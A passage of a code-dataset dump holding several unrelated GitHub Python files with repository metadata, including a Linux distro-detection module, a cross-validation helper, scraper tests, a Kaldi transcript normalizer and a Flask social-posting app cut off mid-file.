2 ** 10 % 5, \"receive: \", Exponentiation(2, 10, 5))\n print(\"-\" * 20)\n\n print(\"2. Generalized Euclidean algorithm:\")\n print(\"expect: [1, -2, 3] receive: \", EuclidAlgorithm(28, 19))\n print(\"-\" * 20)\n\n print(\"3. Building a shared key using the Diffie-Hellman scheme:\")\n DiffieHellman()\n print(\"-\" * 20)\n\n print(\"4. Baby step, giant step:\")\n BabyStepGiantStep(28406579, 21698472, 16312338)\n print(\"-\" * 10)\n BabyStepGiantStep(323605307, 229635193, 45162172)\n\n\nif __name__ == '__main__':\n main()","repo_name":"zkhip/IS","sub_path":"src/diffie_hellman.py","file_name":"diffie_hellman.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21775367365","text":"# vim: set fileencoding=utf-8 :\n#\n# (C) 2010,2014 Guido Günther \n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n\nimport logging\nimport os\nimport re\nimport subprocess\n\n\ntry:\n import lsb_release\nexcept ImportError:\n lsb_release = None\n\n\nclass Distro(object):\n \"\"\"\n A distribution\n\n @cvar id: distro id as returned by lsb-release\n\n @cvar service_blacklist: services that should never be restarted\n @cvar service_blacklist_re: regex list of services that should\n never be restartet\n @cvar _pkg_services: A C{dict} that maps packages to services. In\n case we find binaries that match a key in this hash restart\n the services listed in values.\n @cvar _pkg_service_blacklist: if we find binaries in the package\n listed as key don't restart services listed in values\n \"\"\"\n id = None\n service_blacklist = set()\n service_blacklist_re = set()\n\n _pkg_services = {}\n _pkg_blacklist = {}\n _pkg_service_blacklist = {}\n\n @classmethod\n def pkg(klass, name):\n \"\"\"Return package object named name\"\"\"\n raise NotImplementedError\n\n @classmethod\n def pkg_by_file(klass, path):\n \"\"\"Return package object that contains path\"\"\"\n raise NotImplementedError\n\n @classmethod\n def restart_service_cmd(klass, service):\n \"\"\"Command to restart service\"\"\"\n raise NotImplementedError\n\n @classmethod\n def restart_service(klass, service):\n \"\"\"Restart a service\"\"\"\n subprocess.call(klass.restart_service_cmd(service))\n\n @classmethod\n def is_service_installed(klass, service):\n \"\"\"Check wether a service exists on the system\"\"\"\n return True\n\n @classmethod\n def pkg_services(klass, pkg):\n \"\"\"\n List of services that package pkg needs restarted that aren't part\n of pkg itself\n \"\"\"\n return [s for s in klass._pkg_services.get(pkg.name, [])\n if klass.is_service_installed(s)]\n\n @classmethod\n def pkg_service_blacklist(klass, pkg):\n \"\"\"\n List of services in pkg that we don't want to be restarted even when\n a binary from this package maps a shared lib that changed.\n \"\"\"\n return klass._pkg_service_blacklist.get(pkg.name, [])\n\n def filter_services(self, services):\n \"\"\"\n Filter out servies that match service_blacklist_re\n \"\"\"\n ret = []\n matchers = [re.compile(b) for b in self.service_blacklist_re]\n for s in services:\n if not any([m.match(s) for m in matchers]):\n ret.append(s)\n return set(ret)\n\n @classmethod\n def has_apt(klass):\n \"\"\"Does the distribution use apt\"\"\"\n return False\n\n @staticmethod\n def detect():\n return detect()\n\n\nimport whatmaps.debiandistro # noqa: E402\nimport whatmaps.redhatdistro # noqa: E402\n\n\ndef detect():\n \"\"\"\n Detect the distribution we run on. Returns C{None} if the\n distribution is unknown.\n \"\"\"\n id = None\n\n if lsb_release:\n id = lsb_release.get_distro_information()['ID']\n else:\n try:\n lsb_cmd = subprocess.Popen(['lsb_release', '--id', '-s'],\n stdout=subprocess.PIPE,\n stderr=subprocess.DEVNULL)\n output = lsb_cmd.communicate()[0]\n if not lsb_cmd.returncode:\n id = output.decode().split('\\n')[0].strip()\n except OSError:\n # id is None in this case\n pass\n\n if id == whatmaps.debiandistro.DebianDistro.id:\n return whatmaps.debiandistro.DebianDistro\n elif id == whatmaps.redhatdistro.FedoraDistro.id:\n return whatmaps.redhatdistro.FedoraDistro\n else:\n if os.path.exists('/usr/bin/dpkg'):\n logging.warning(\"Unknown distro but dpkg found, assuming Debian\")\n return whatmaps.debiandistro.DebianDistro\n elif os.path.exists('/bin/rpm'):\n logging.warning(\"Unknown distro but rpm found, assuming Fedora\")\n return whatmaps.debiandistro.FedoraDistro\n else:\n return None\n","repo_name":"agx/whatmaps","sub_path":"whatmaps/distro.py","file_name":"distro.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"41606789971","text":"# This one uses list which has bad performance, which cannot solve part2 \n\nplayers = 471\nlast = 72026\n\nelves = {k:v for k, v in [(x,0) for x in range(1,players+1)]}\nmarbles = [0]\n\nc = 0\ne = 0\n\nfor m in range(1,last+1):\n e = 1 if e >= players else e+1\n if (m%23 == 0):\n c = c-7 if c > 7 else len(marbles)+c-7\n elves[e] += (m + marbles.pop(c))\n else:\n c = (c+2) % len(marbles) if (c+2) % len(marbles) != 0 else len(marbles)\n marbles.insert(c, m)\n\nprint(max(elves.values()))","repo_name":"Ryc1x/advent-of-code-2018","sub_path":"day9-marble-mania/puzzle1.py","file_name":"puzzle1.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30572202836","text":"from __future__ import division, print_function\nimport sys\nimport gsd\nimport gsd.hoomd\nimport freud\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nif __name__=='__main__':\n\n fn_in = sys.argv[1]\n j = int(sys.argv[2])\n #fn_out = sys.argv[2]\n #istart = int(sys.argv[3])\n #iend = int(sys.argv[4])\n\n config = gsd.hoomd.open(fn_in, 'rb')\n Nframe = len(config)\n \n l_box = config[0].configuration.box[:2]\n freud_box = freud.box.Box(Lx=l_box[0], Ly=l_box[1], is2D=True)\n hex_order = freud.order.HexOrderParameter(rmax=1.2, k=6, n=6)\n \n pos = config[j].particles.position\n hex_order.compute(freud_box, pos)\n\n psi6 = hex_order.psi\n ave_psi6 = np.mean(psi6)\n relative_angles = np.angle(psi6) - np.angle(ave_psi6)\n #print(j, abs(ave_psi6), file=open(fn_out, 'a'))\n \n fig = plt.scatter(pos[:,0], pos[:,1], c=abs(relative_angles), cmap='viridis', vmin=0.0, vmax=np.pi, s=2.5, lw=0)\n #plt.colorbar(fig)\n plt.axes().set_aspect('equal')\n plt.axis('off')\n\n plt.show()\n\n","repo_name":"nyu-compphys-2018/project-BumingGuo","sub_path":"code&script/psi6_fig.py","file_name":"psi6_fig.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33923948124","text":"from typing import Any, List\n\nfrom fastapi import APIRouter, Depends\n\nfrom app import schemas\nfrom app.chain.download import DownloadChain\nfrom app.core.security import verify_token\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", summary=\"正在下载\", response_model=List[schemas.DownloadingTorrent])\nasync def read_downloading(\n _: schemas.TokenPayload = Depends(verify_token)) -> Any:\n \"\"\"\n 查询正在下载的任务\n \"\"\"\n return DownloadChain().downloading()\n\n\n@router.put(\"/{hashString}/start\", summary=\"开始任务\", response_model=schemas.Response)\nasync def start_downloading(\n hashString: str,\n _: schemas.TokenPayload = Depends(verify_token)) -> Any:\n \"\"\"\n 开如下载任务\n \"\"\"\n ret = DownloadChain().set_downloading(hashString, \"start\")\n return schemas.Response(success=True if ret else False)\n\n\n@router.put(\"/{hashString}/stop\", summary=\"暂停任务\", response_model=schemas.Response)\nasync def stop_downloading(\n hashString: str,\n _: schemas.TokenPayload = Depends(verify_token)) -> Any:\n \"\"\"\n 控制下载任务\n \"\"\"\n ret = DownloadChain().set_downloading(hashString, \"stop\")\n return schemas.Response(success=True if ret else False)\n\n\n@router.delete(\"/{hashString}\", summary=\"删除下载任务\", response_model=schemas.Response)\nasync def remove_downloading(\n hashString: str,\n _: schemas.TokenPayload = Depends(verify_token)) -> Any:\n \"\"\"\n 控制下载任务\n \"\"\"\n ret = DownloadChain().remove_downloading(hashString)\n return schemas.Response(success=True if ret else False)\n","repo_name":"abczi/MoviePilot","sub_path":"app/api/endpoints/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"44316400069","text":"import random\nfrom typing import Any\nfrom time import time\nimport pickle\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom kfold import Kfold\nfrom metrics import (\n get_confusion_matrix,\n get_accuracy_score,\n get_precision_score,\n get_recall_score,\n get_f1_score\n)\n\n\ndef get_random_combinations_of_parameters(\n parameters: dict,\n number_of_combinations: int\n) -> list[dict[Any, Any]]:\n combinations = []\n for _ in range(number_of_combinations):\n combination = {}\n for parameter, values in parameters.items():\n combination[parameter] = random.choice(values)\n combinations.append(combination)\n return combinations\n\n\ndef get_best_parameters(\n classifier: Any,\n parameters_grid: dict[str, list[Any]],\n numbers_of_folds: int,\n number_of_parameters_combinations: int,\n values: tuple[np.ndarray, np.ndarray]\n) -> tuple[dict[str, Any], pd.DataFrame]:\n grid_results = []\n parameters_combinations = get_random_combinations_of_parameters(\n parameters_grid,\n number_of_parameters_combinations\n )\n X, y = values\n for combination in parameters_combinations:\n tunning_kfold = Kfold(numbers_of_folds)\n times = []\n scores = []\n for (\n x_train_tunning,\n x_test_tunning,\n y_train_tunning,\n y_test_tunning\n ) in tunning_kfold.split(X, y):\n initial_time = time()\n cls = classifier(**combination)\n cls.fit(x_train_tunning, y_train_tunning)\n final_time = time()\n times.append(final_time - initial_time)\n predictions = cls.predict(x_test_tunning)\n confusion_matrix = get_confusion_matrix(y_test_tunning, predictions)\n score = get_f1_score(confusion_matrix.values)\n scores.append(score)\n mean_time = np.asarray(times).mean()\n scores = np.asarray(scores)\n mean_score = scores.mean()\n std_score = scores.std()\n grid_results.append(\n dict(combination, f1_mean_score=mean_score, f1_std_score=std_score, mean_time=mean_time)\n )\n grid_results = pd.DataFrame(grid_results).\\\n sort_values(by=[\"f1_mean_score\"], ascending=False).\\\n reset_index(drop=True)\n\n best_parameters = grid_results.iloc[:, :-3].to_dict(\"records\")[0]\n\n return best_parameters, grid_results\n\n\ndef run_cross_validation(\n classifier: Any,\n classifier_name: str,\n parameters_grid: dict[str, Any],\n number_of_parameters_combinations: int,\n numbers_of_folds: int,\n values: tuple[np.ndarray, np.ndarray]\n) -> pd.DataFrame:\n validation_kfold = Kfold(k=numbers_of_folds)\n X, y = values\n results = []\n for index_fold, (\n x_train_validation,\n x_test_validation,\n y_train_validation,\n y_test_validation\n ) in enumerate(validation_kfold.split(X, y)):\n best_parameters, tunning_results = get_best_parameters(\n classifier=classifier,\n parameters_grid=parameters_grid,\n numbers_of_folds=numbers_of_folds-1,\n number_of_parameters_combinations=number_of_parameters_combinations,\n values=(x_train_validation, y_train_validation)\n )\n tunning_results.to_csv(f\"../data/results/{classifier_name}/tunning/fold_{index_fold}.csv\")\n\n cls = classifier(**best_parameters)\n cls.fit(x_train_validation, y_train_validation)\n\n train_predictions = cls.predict(x_train_validation)\n train_confusion_matrix = get_confusion_matrix(y_train_validation, train_predictions).values\n \n train_accuracy = get_accuracy_score(train_confusion_matrix)\n train_precision = get_precision_score(train_confusion_matrix)\n train_recall = get_recall_score(train_confusion_matrix)\n train_f1_score = get_f1_score(train_confusion_matrix)\n\n validation_predictions = cls.predict(x_test_validation)\n validation_confusion_matrix = get_confusion_matrix(y_test_validation, validation_predictions).values\n validation_accuracy = get_accuracy_score(validation_confusion_matrix)\n validation_precision = get_precision_score(validation_confusion_matrix)\n validation_recall = get_recall_score(validation_confusion_matrix)\n validation_f1_score = get_f1_score(validation_confusion_matrix)\n \n results.append(\n {\n \"classifier\": cls,\n \"tuned_parameters\": str(best_parameters),\n \"tunning_mean_score\": tunning_results.values[0][3],\n \"tunning_std_score\": tunning_results.values[0][4],\n \"train_accuracy\": train_accuracy,\n \"train_precision\": train_precision,\n \"train_recall\": train_recall,\n \"train_f1_score\": train_f1_score,\n \n \"validation_accuracy\": validation_accuracy,\n \"validation_precision\": validation_precision,\n \"validation_recall\": validation_recall,\n \"validation_f1_score\": validation_f1_score\n }\n )\n\n return pd.DataFrame(results).\\\n sort_values(by=\"validation_f1_score\", ascending=False).\\\n reset_index(drop=True)\n","repo_name":"rjribeiro/machine_learning","sub_path":"k_fold/src/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18210377778","text":"import random\n\n# Заранее определенные значения для ключей и значений\nkeys_list = [\"apple\", \"banana\", \"cherry\", \"watermellon\", \"pineapple\"]\nvalues_list = [random.randint(1, 15) for _ in keys_list]\n\n# Создаем словарь из списков\nmy_dict = dict(zip(keys_list, values_list))\n\nprint(\"Словарь:\", my_dict)\n","repo_name":"qwaxa/Python_Lab","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20289371008","text":"#!/usr/bin/env python\n\nimport datetime\nfrom mock import patch\n\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nimport app_config\napp_config.DATABASE_NAME = 'carebot_test.db'\napp_config.date_cutoff = datetime.date(1997, 1, 1)\n\nfrom scrapers.npr_spreadsheet import SpreadsheetScraper\nfrom util.config import Config\nfrom util.models import Story\nfrom tests.test_util.db import clear_stories\n\nclass TestSpreadsheet(unittest.TestCase):\n source = {\n 'doc_key': 'foo-bar-baz'\n }\n\n def test_scrape_spreadsheet(self):\n \"\"\"\n Make sure we grab the right data from spreadsheets\n \"\"\"\n scraper = SpreadsheetScraper(self.source)\n stories = scraper.scrape_spreadsheet('tests/data/stories.xlsx')\n self.assertEqual(len(stories), 4)\n\n self.assertEqual(stories[0]['date'], '42467') # Crappy excel date format\n self.assertEqual(stories[0]['graphic_slug'], 'voting-wait-20160404')\n self.assertEqual(stories[0]['graphic_type'], 'Graphic')\n self.assertEqual(stories[0]['story_headline'], 'What Keeps Election Officials Up At Night? Fear Of Long Lines At The Polls')\n self.assertEqual(stories[0]['story_url'], 'http://www.npr.org/2016/04/07/473293026/what-keeps-election-officials-up-at-night-fear-of-long-lines-at-the-polls')\n self.assertEqual(stories[0]['contact'], 'Alyson Hurt')\n\n self.assertEqual(stories[0]['date'], '42467')\n self.assertEqual(stories[3]['graphic_slug'], 'seed-market-20160405')\n self.assertEqual(stories[3]['graphic_type'], 'Graphic')\n self.assertEqual(stories[3]['story_headline'], 'Big Seed: Consolidation Is Shrinking The Industry Even Further')\n self.assertEqual(stories[3]['story_url'], 'http://www.npr.org/sections/thesalt/2016/04/06/472960018/big-seed-consolidation-is-shrinking-the-industry-even-further')\n self.assertEqual(stories[3]['contact'], 'Alyson Hurt')\n\n @patch('util.s3.Uploader.upload', return_value='http://image-url-here')\n def test_write_spreadsheet(self, mock_upload):\n \"\"\"\n Make sure we save the stories to the database when scraping from a\n spreadsheet\n \"\"\"\n clear_stories()\n\n scraper = SpreadsheetScraper(self.source)\n stories = scraper.scrape_spreadsheet('tests/data/stories.xlsx')\n\n scraper.write(stories)\n\n results = Story.select()\n self.assertEqual(len(results), 4)\n\n for idx, story in enumerate(stories):\n self.assertEqual(results[idx].name, story['story_headline'])\n self.assertEqual(results[idx].url, story['story_url'])\n\n @patch('util.s3.Uploader.upload')\n def test_write_spreadsheet_duplicates(self, mock_upload):\n \"\"\"\n Make sure stories don't get inserted more than once\n \"\"\"\n mock_upload.return_value = 'http://image-url-here'\n\n clear_stories()\n\n scraper = SpreadsheetScraper(self.source)\n stories = scraper.scrape_spreadsheet('tests/data/stories.xlsx')\n\n # Insert the stories\n scraper.write(stories)\n results = Story.select()\n self.assertEqual(len(results), 4)\n\n # Now insert them again and make sure we don't have duplicates\n scraper.write(stories)\n results = Story.select()\n self.assertEqual(len(results), 4)\n","repo_name":"thecarebot/carebot","sub_path":"tests/test_spreadsheet.py","file_name":"test_spreadsheet.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"} +{"seq_id":"16893407415","text":"import shutil\nimport random\nfrom split_data_utils import SplitData\n\ndef main():\n \"\"\"Main code\"\"\"\n SplitData.InitBashArgs()\n args = SplitData.InitBashArgs.get_args()\n\n images_dir = args.images_dir\n test_images_dir = args.test_images_dir\n train_images_dir = args.train_images_dir\n labels_dir = args.labels_dir\n test_labels_dir = args.test_labels_dir\n train_labels_dir = args.train_labels_dir\n\n images = SplitData.Dataset.get_ordered_path(images_dir)\n labels = SplitData.Dataset.get_ordered_path(labels_dir)\n\n possible_indices = list(range(10))\n first_index = random.choice(possible_indices)\n possible_indices.remove(first_index)\n second_index = random.choice(possible_indices)\n\n for file_id, _ in enumerate(images):\n if (file_id % 10 == first_index) or (file_id % 10 == second_index):\n shutil.copyfile(images_dir + images[file_id], test_images_dir + images[file_id])\n shutil.copyfile(labels_dir + labels[file_id], test_labels_dir + labels[file_id])\n else:\n shutil.copyfile(images_dir + images[file_id], train_images_dir + images[file_id])\n shutil.copyfile(labels_dir + labels[file_id], train_labels_dir + labels[file_id])\n\n if not file_id % 10:\n possible_indices = list(range(10))\n first_index = random.choice(possible_indices)\n possible_indices.remove(first_index)\n second_index = random.choice(possible_indices)\n\nif __name__ == '__main__':\n main()\n","repo_name":"rohand2412/opencv-capture-data-for-ml","sub_path":"split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22898587621","text":"from __future__ import print_function\n\nimport sys\nimport argparse\n\nfrom german_asr_lm_tools.normalize_numbers import NumberFormatter\n\n# Also change some very frequent words to new ortographic rules in German\n# e.g. muß -> muss\nword_replace_rules = {'muß':'muss', 'daß':'dass', 'Daß':'dass', '-$':' ', '-$':' ', '$':'', '$':'', '-':'' , ' ' : ' '}\n\ndef process_input(norm_number_words=False, convert_numbers=False):\n if norm_number_words or convert_numbers:\n nf = NumberFormatter()\n\n for line in sys.stdin:\n line = line.replace('Das', 'das')\n # remove ähs, ähms and unks as well as hesitations (häs)\n line = line.replace('Äh', '').replace('äh', '').replace('Ähm', '').replace('ähm', '').replace('häs', '').replace('', '').replace('', '')\n split = line.split()\n if norm_number_words or convert_numbers:\n split = nf.normalize_text(split, convert_to_numbers=convert_numbers)\n if len(split) > 1:\n if len(split[1]) > 1:\n split[1] = split[1][0].upper() + split[1][1:]\n output = ' '.join(split)\n elif len(split[1]) == 1:\n split[1] = split[1][0].upper()\n output = ' '.join(split)\n else:\n #if we have issues just pass the line unchanged\n output = line\n\n for replace_rule in word_replace_rules.items():\n output = output.replace(replace_rule[0], replace_rule[1])\n print(output)\n\n else:\n #if we have issues just pass the line unchanged\n print(line)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Prepares the files from the TUDA corpus (XML) into text transcriptions for KALDI')\n #parser.add_argument('-f', '--file', dest='file', help='process this (python pickle) lexicon file', type=str)\n parser.add_argument('-w', '--norm-number-words', dest='norm_number_words', help='Normalize number words (drei und sechzig -> dreiundsechzig)', action='store_true', default=False)\n parser.add_argument('-n', '--convert-numbers', dest='convert_numbers', help='Convert numbers (drei und sechzig -> 63, dreiundsechzig -> 63)', action='store_true', default=False)\n\n args = parser.parse_args()\n process_input(args.norm_number_words, args.convert_numbers)\n","repo_name":"uhh-lt/kaldi-tuda-de","sub_path":"s5_r2/local/output_normalizer.py","file_name":"output_normalizer.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"19"} +{"seq_id":"22896067256","text":"import pyexlatex as pl\nimport pyexlatex.table as lt\nimport pyexlatex.presentation as lp\nimport pyexlatex.graphics as lg\nimport pyexlatex.layouts as ll\n\n\ndef get_model_structure_graphic() -> lg.TikZPicture:\n inputs_block_options = [\n 'fill=orange!30'\n ]\n\n model_block_options = [\n 'fill=blue!50'\n ]\n\n sub_model_block_options = [\n 'fill=blue!90'\n ]\n\n step_block_options = [\n 'fill=cyan!20'\n ]\n\n outputs_block_options = [\n 'fill=green!20'\n ]\n\n text_options = [\n 'text=white'\n ]\n\n step_text_options = [\n 'text=black'\n ]\n\n inputs_text_options = outputs_text_options = step_text_options\n\n arrow_options = [\n 'line width=0.75mm',\n ]\n\n inputs_rectangle = lg.Rectangle(2, 8, offset=(-3.35, 4), contents=pl.Bold('Inputs'),\n shape_options=inputs_block_options,\n text_options=inputs_text_options)\n\n model_rectangle = lg.Rectangle(5, 8, offset=(1.25, 4), contents=pl.Bold('Model'), content_position='bottom',\n content_offset=0.2, shape_options=model_block_options,\n text_options=text_options)\n\n outputs_rectangle = lg.Rectangle(2, 8, offset=(5.85, 4), contents=pl.Bold('Outputs'),\n shape_options=outputs_block_options,\n text_options=outputs_text_options)\n\n sub_model_rectangles = []\n step_rectangles = []\n for i in range(3):\n y_offset = 1.75 + i * 2.5\n sub_model_rectangles.append(\n lg.Rectangle(4, 1.75, offset=(1.25, y_offset), contents='Sub-Model',\n shape_options=sub_model_block_options, text_options=text_options,\n content_position='bottom'),\n )\n for j in range(3):\n x_offset = j * 1.25\n step_rectangles.append(\n lg.Rectangle(1.1, 1, offset=(x_offset, y_offset + 0.2), contents='Step',\n shape_options=step_block_options, text_options=step_text_options,\n )\n )\n\n arrows = [\n lg.Arrow((-2.3, 4), (-1.3, 4), options=arrow_options),\n lg.Arrow((3.8, 4), (4.8, 4), options=arrow_options),\n ]\n\n return lg.TikZPicture([\n inputs_rectangle,\n model_rectangle,\n *sub_model_rectangles,\n *step_rectangles,\n outputs_rectangle,\n *arrows,\n ])\n","repo_name":"nickderobertis/fin-model-course","sub_path":"fin_model_course/pltemplates/graphics/model_structure.py","file_name":"model_structure.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"6664289676","text":"from flask import Flask, render_template, request, redirect, flash, session, jsonify, abort, url_for\nfrom werkzeug.utils import secure_filename\nimport os\nfrom dotenv import load_dotenv\nfrom src.models import db, User_account, User_comment, Post, Post_Vote\nfrom flask_bcrypt import Bcrypt\nfrom src.repositories.user_account_repository import user_repository_singleton\nfrom src.repositories.post_repository import post_repository_singleton\nfrom sqlalchemy import update\nimport requests\nimport time\nimport atexit\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom post_bot import post_bot_singleton\n\n\nload_dotenv()\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URI')\napp.secret_key = os.getenv('APP_SECRET_KEY')\n\napp.config['YOUTUBE_API_KEY'] = os.environ.get('YOUTUBE_API_KEY')\n\ndb.init_app(app)\n\nbcrypt = Bcrypt(app)\n\n@app.before_first_request\ndef init_scheduler():\n scheduler = BackgroundScheduler()\n scheduler.add_job(func=post_bot_singleton.preform_post, trigger=\"interval\", seconds= post_bot_singleton.UPDATE_SECONDS)\n scheduler.start()\n # Shut down the scheduler when exiting the app\n atexit.register(lambda: scheduler.shutdown())\n\n\ndef get_index_render_template(for_posts):\n states = []\n username = None\n if session.get('user') != None:\n current_user_ID = int(session.get('user')['user_account_id'])\n user = user_repository_singleton.get_user_by_id(current_user_ID)\n if user != None: \n username = session['user']['username']\n for post in for_posts:\n vote_update = Post_Vote.query.get((current_user_ID, post.post_id))\n vote_state = 0\n if vote_update != None:\n if vote_update.upvote:\n vote_state = 1\n else:\n vote_state = 2\n states.append(vote_state)\n if username == None:\n return render_template('index.html', posts = for_posts , vote_states = states)\n else:\n return render_template('index.html', posts = for_posts , vote_states = states, username = username)\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n all_posts = post_repository_singleton.get_all_posts()\n\n return(get_index_render_template(all_posts))\n\n\n\n\n@app.route('/updatePostVotes', methods=['POST'])\ndef updatePostVote():\n if session.get('user') != None:\n current_user_ID = int(session.get('user')['user_account_id'])\n user = user_repository_singleton.get_user_by_id(current_user_ID)\n if user != None: \n postID = request.form.get(\"post\")\n vote = request.form.get(\"vote\")\n \n if postID.isnumeric() and vote.isnumeric():\n if int(vote) >= 1 and int(vote) <=2:\n post_repository_singleton.vote_post(int(current_user_ID), int(postID), vote)\n vote_update = Post_Vote.query.get((current_user_ID, postID))\n vote_state = 0\n if vote_update != None:\n if vote_update.upvote:\n vote_state = 1\n else:\n vote_state = 2\n return(jsonify(\n status=\"200\",\n vote_count=post_repository_singleton.get_post_by_id(postID).get_vote_count(),\n state=vote_state))\n else:\n flash('Please log in to upvote posts')\n print(\"error user not found\")\n return(jsonify(status=\"404\"))\n else:\n flash('Please log in to upvote posts')\n print(\"error no user logged in\")\n return(jsonify(status=\"400\"))\n\n@app.get('/profile/settings')\ndef settings():\n if 'user' not in session:\n return render_template('/')\n\n first_name=session['user']['first_name']\n last_name=session['user']['last_name']\n username=session['user']['username']\n profile_path=session['user']['profile_path']\n\n return render_template('settings.html', first_name=first_name, last_name=last_name, username=username, profile_path=profile_path)\n\n\n@app.route('/post', methods=['GET'])\ndef post():\n post_id = request.args.get('post_id', None)\n post = post_repository_singleton.get_post_by_id(post_id)\n vote_state = 0\n if post != None:\n if session.get('user') != None:\n current_user_ID = int(session.get('user')['user_account_id'])\n user = user_repository_singleton.get_user_by_id(current_user_ID)\n if user != None: \n username = session['user']['username']\n vote_update = Post_Vote.query.get((current_user_ID, post.post_id))\n \n if vote_update != None:\n if vote_update.upvote:\n vote_state = 1\n else:\n vote_state = 2\n return render_template('post.html', post = post, vote_state = vote_state)\n else:\n ## return 404\n return abort(404)\n \n \n\n username=session['user']['username']\n return render_template('post.html', posts = all_posts, username=username)\n\n@app.get('/profile')\ndef profile():\n if 'user' not in session:\n return redirect('/')\n\n user_id = session['user']['user_account_id']\n first_name=session['user']['first_name']\n last_name=session['user']['last_name']\n username=session['user']['username']\n profile_path=session['user']['profile_path']\n \n user_posts = post_repository_singleton.get_all_posts_by_user(user_id)\n return render_template('profile.html', first_name=first_name, last_name=last_name, username=username, profile_path=profile_path, user_posts=user_posts)\n\n@app.post('/profile')\ndef get_user_posts():\n # all_posts = post_repository_singleton.get_all_posts()\n \n return render_template('profile.html')\n\n\n@app.route(\"/reply-comment/\", methods=['POST'])\n## TODO: Login needs to be required to comment\ndef create_comment(parent_post_id):\n text = request.form.get('text')\n if not text:\n flash('Empty Comment. Try again.', category='error')\n else: \n post = Post.query.filter_by(post_id = parent_post_id)\n if session.get('user') != None:\n current_user_ID = int(session.get('user')['user_account_id'])\n if post:\n comment = User_comment(comment_text=text, parent_post_id=parent_post_id, commented_by_id = current_user_ID)\n db.session.add(comment)\n db.session.commit()\n else:\n flash('Post does not exist.', category='error')\n else:\n print('error no user logged in')\n return redirect(url_for('post', post_id=parent_post_id))\n\n\n@app.get('/create_post')\ndef get_create_post():\n if 'user' not in session:\n return redirect('/login_page')\n\n username=session['user']['username']\n return render_template('create_post.html', username=username)\n\n@app.post('/create_post')\ndef create_post():\n title = request.form.get('title')\n text = request.form.get('text')\n\n if title and text:\n post_repository_singleton.create_post_text(title, text, session['user']['user_account_id'])\n\n elif title and 'image' in request.files:\n image = request.files['image']\n\n if image.filename == '':\n return redirect('/create_post')\n \n if image.filename.rsplit('.', 1)[1].lower() not in ['jpg', 'jpeg', 'gif', 'png']:\n return redirect('/create_post')\n \n safe_image_file = secure_filename(image.filename)\n image.save(os.path.join('static/assets', 'post_images', safe_image_file))\n\n post_repository_singleton.create_post_stored_image(title, safe_image_file, session['user']['user_account_id'])\n\n elif title and request.form.get('link'):\n url = request.form.get('link')\n embed_video = url.replace(\"watch?v=\", \"embed/\")\n\n post_repository_singleton.create_post_embedded_video(title, embed_video, session['user']['user_account_id'])\n\n elif title and 'video' in request.files:\n video = request.files['video']\n\n if video.filename == '':\n return redirect('/create_post')\n \n if video.filename.rsplit('.', 1)[1].lower() not in ['mp4', 'ogg', 'webm']:\n return redirect('/create_post')\n\n safe_video_file = secure_filename(video.filename)\n video.save(os.path.join('static/assets', 'post_videos', safe_video_file))\n \n post_repository_singleton.create_post_stored_video(title, safe_video_file, session['user']['user_account_id'])\n else:\n return redirect('/create_post')\n\n return redirect('/')\n \n\n@app.get('/register_form')\ndef register_form():\n return render_template('register.html')\n\n@app.post('/register')\ndef register():\n first_name = request.form.get('firstname')\n last_name = request.form.get('lastname')\n username = request.form.get('username')\n password = request.form.get('password')\n password2 = request.form.get('password2')\n\n if (password != password2):\n flash('Passwords do not match. Please try again.')\n return redirect('/register_form')\n\n existing_user = User_account.query.filter_by(username=username).first()\n if existing_user:\n flash('Username already taken.')\n return redirect('/register_form')\n\n hashed_bytes = bcrypt.generate_password_hash(password, int(os.getenv('BCRYPT_ROUNDS')))\n hashed_password = hashed_bytes.decode('utf-8')\n\n if 'profile' not in request.files:\n flash('Error processing file. Please try again')\n return redirect('/register_form')\n\n profile_picture = request.files['profile']\n\n if profile_picture.filename == '':\n flash('Error processing file. Please try again')\n return redirect('/register_form')\n \n if profile_picture.filename.rsplit('.', 1)[1].lower() not in ['jpg', 'jpeg', 'gif', 'png']:\n flash('Please use one of the approved file formats (jpg, jpeg, gif, png)')\n return redirect('/register_form')\n\n safe_filename = 